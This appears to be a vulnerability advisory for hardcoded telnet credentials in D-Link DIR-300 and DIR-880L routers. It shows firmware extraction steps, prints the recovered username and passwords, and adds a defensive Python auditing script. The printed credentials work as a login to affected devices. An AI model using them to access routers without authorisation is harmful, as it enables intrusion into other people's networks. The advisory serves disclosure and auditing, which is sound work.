CVE-2020-29322

Updated 26 May 2026

Background

Hardcoded Telnet Credentials

  1. CVSS
    7.5 High
  2. VECTOR
    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  3. IMPACT
    Credential disclosure, Unauthenticated access
  4. AFFECTED
    D-Link DIR-300 2.06
    D-Link DIR-880L 1.07

A series of old D-Link routers ship hardcoded credentials for the telnet service. The credentials can be recovered through firmware decompilation, allowing an unauthenticated attacker to log in via telnet.

Reproduction

POC || GTFO

DIR-300

Download DIR-300 firmware version 2.06 and extract it using binwalk:

zsh
binwalk -e dir300b_v2.06_f4la.bin

The username Alphanetworks is hard-coded in etc/scripts/misc/telnetd.sh:

zsh
telnetd -l "/usr/sbin/login" -u Alphanetworks:$image_sign -i $lf &

The password is stored in etc/config/image_sign:

zsh
wrgn23_dlwbr_dir300b

DIR-880L

Download DIR-880L firmware version 1.07 and extract it using binwalk:

zsh
binwalk -e DIR880A1_FW107WWb08.bin

The username Alphanetworks is hard-coded in etc/init0.d/S80telnetd.sh:

zsh
telnetd -l /usr/sbin/login -u Alphanetworks:$image_sign -i br0 &

The password is stored in etc/config/image_sign:

zsh
wrgac16_dlink.2013gui_dir880
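
The same check can be automated when auditing an extracted firmware tree. The following Python is an added example, not part of the original advisory or of D-Link's code: it walks a binwalk-extracted root filesystem, flags every telnetd line that passes -u USER:SECRET, and reports whether the secret is baked into the image. The function names and the sample tree (with a placeholder image_sign value) are constructed for illustration; it assumes, as the page states, that $image_sign is filled from etc/config/image_sign.

```python
import re
import tempfile
from pathlib import Path

# -u USER:SECRET on a telnetd command line, as in the two scripts quoted above.
TELNETD_U = re.compile(r"""\btelnetd\b.*?\s-u\s+["']?([^\s:"']+):([^\s"']+)""")
# Assumption taken from the page: $image_sign is filled from this file in the image.
SIGN_FILE = "etc/config/image_sign"

def audit_rootfs(rootfs):
    """Return one finding per active telnetd line that passes -u USER:SECRET."""
    root = Path(rootfs)
    findings = []
    for script in sorted(p for p in root.rglob("*.sh") if p.is_file()):
        lines = script.read_text(errors="replace").splitlines()
        for lineno, line in enumerate(lines, 1):
            match = TELNETD_U.search(line)
            if line.lstrip().startswith("#") or not match:
                continue  # commented out, or no credential argument
            user, secret = match.groups()
            if secret.startswith("$"):
                # Variable reference: hardcoded only if the image ships the value.
                sign = root / SIGN_FILE
                baked_in = (secret.strip("${}") == "image_sign"
                            and sign.is_file() and bool(sign.read_text().strip()))
                source = SIGN_FILE if baked_in else "unresolved variable"
            else:
                baked_in, source = True, "literal in script"
            findings.append({"script": script.relative_to(root).as_posix(),
                             "line": lineno, "user": user,
                             "secret_source": source, "hardcoded": baked_in})
    return findings

def build_sample_rootfs(root):
    """Constructed sample tree: script line from the page, placeholder secret."""
    root = Path(root)
    (root / "etc/init0.d").mkdir(parents=True)
    (root / "etc/config").mkdir(parents=True)
    (root / "etc/init0.d/S80telnetd.sh").write_text(
        "#!/bin/sh\n# telnetd -u old:old\n"
        "telnetd -l /usr/sbin/login -u Alphanetworks:$image_sign -i br0 &\n")
    (root / SIGN_FILE).write_text("CONSTRUCTED_PLACEHOLDER_SIGN\n")
    return root

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for finding in audit_rootfs(build_sample_rootfs(tmp)):
            print(finding)
```

A finding with hardcoded set to True means every device running that image accepts the same telnet login, so the image should be treated as affected regardless of the web UI password.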